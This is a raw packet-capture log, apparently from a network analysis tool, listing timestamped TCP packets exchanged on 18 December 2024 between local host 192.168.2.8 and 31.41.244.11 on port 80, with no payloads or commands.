                                                                                                                                                                                          Dec 18, 2024 09:07:18.604115963 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.607548952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.607662916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.607723951 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.611095905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.611136913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.611193895 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.611193895 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.614716053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.614916086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.614981890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.618052959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.618135929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.618326902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.621222973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.621296883 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.621345043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.623485088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.624378920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.624442101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.624447107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.626471043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.627549887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.627613068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.627613068 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.627671957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.630408049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.630561113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.630619049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.633342981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.633466959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.633523941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.636210918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.636266947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.636327028 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.638999939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.639100075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.639163017 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.641788960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.641882896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.641956091 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.644382954 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.644447088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.644490957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.646986961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.647047997 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.647105932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.647535086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.649882078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.650062084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.650125980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.652601004 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.652702093 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.652770042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.655359030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.655492067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.655551910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.657275915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.657330036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.657341957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.659466982 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.659802914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.659853935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.659928083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.659980059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.662147045 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.662216902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.662313938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.662362099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.664417982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.664473057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.664525986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.666693926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.666757107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.666805983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.669034958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.669090986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.669181108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.671367884 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.671461105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.671693087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.673724890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.673784018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.673789024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.673830986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.675944090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.676052094 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.676104069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.678141117 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.678277016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.678327084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.680454969 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.680505037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.680624008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.681545973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.682642937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.682763100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.682807922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.684901953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.685026884 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.685077906 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.686974049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.687113047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.687160015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.688332081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.688379049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.688473940 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.689469099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.689604998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.689650059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.689676046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.689716101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.690809965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.690860987 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.690901041 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.690944910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.692080021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.692161083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.692172050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.692214966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.693356037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.693404913 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.693454981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.693500042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.694591999 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.694637060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.694689035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.694732904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.695796013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.696024895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.696070910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.697067976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.697160006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.697206974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.698334932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.698394060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.698467970 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.699554920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.699606895 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.699693918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.700797081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.700845957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.700900078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.700943947 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.702048063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.702147961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.702229023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.703294039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.703340054 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.703427076 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.704603910 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.704660892 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.704720020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.705749989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.705801010 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.705805063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.705842972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.707031965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.707087040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.707134962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.708200932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.708358049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.708405018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.709456921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.709503889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.709511042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.710464001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.710769892 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.710817099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.710824966 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.710869074 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.711899042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.711949110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.712023973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.712069988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.713462114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.713553905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.713603973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.714641094 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.714694977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.714745045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.715651035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.715703011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.715785027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.716841936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.716892004 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.716941118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.718025923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.718085051 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.718142033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.718189001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.719254971 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.719350100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.719398975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.720479012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.720660925 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.720712900 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.721770048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.721822023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.721905947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.722467899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.722918034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.722968102 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.723051071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.723098040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.724128962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.724216938 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.724239111 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.724283934 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.725421906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.725476980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.725533962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.726567030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.726617098 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.726686954 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.727834940 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.727885962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.727935076 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.727981091 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.729099035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.729224920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.729274988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.730429888 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.730535030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.730586052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.732076883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.732250929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.732300997 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.733541012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.733592987 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.733629942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.734478951 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.734532118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.734601021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.734607935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.734649897 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.735622883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.735671043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.735744953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.735794067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.736551046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.736597061 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.736603975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.736649990 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.737615108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.737741947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.737797976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.738797903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.738957882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.739007950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.740005016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.740052938 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.740134954 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.741241932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.741292953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.741345882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.742480993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.742527962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.742597103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.742641926 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.743755102 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.743863106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.743913889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.744987965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.745091915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.745138884 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.746148109 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.746197939 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.746268034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.746465921 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.747788906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.747843981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.747843027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.747889996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.748748064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.748800993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.748850107 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.749759912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.752726078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838002920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838079929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838114977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838176012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838188887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838222980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838251114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838947058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.838999987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.839049101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.839662075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.839713097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.839806080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.839855909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.840235949 CET804971431.41.244.11192.168.2.8
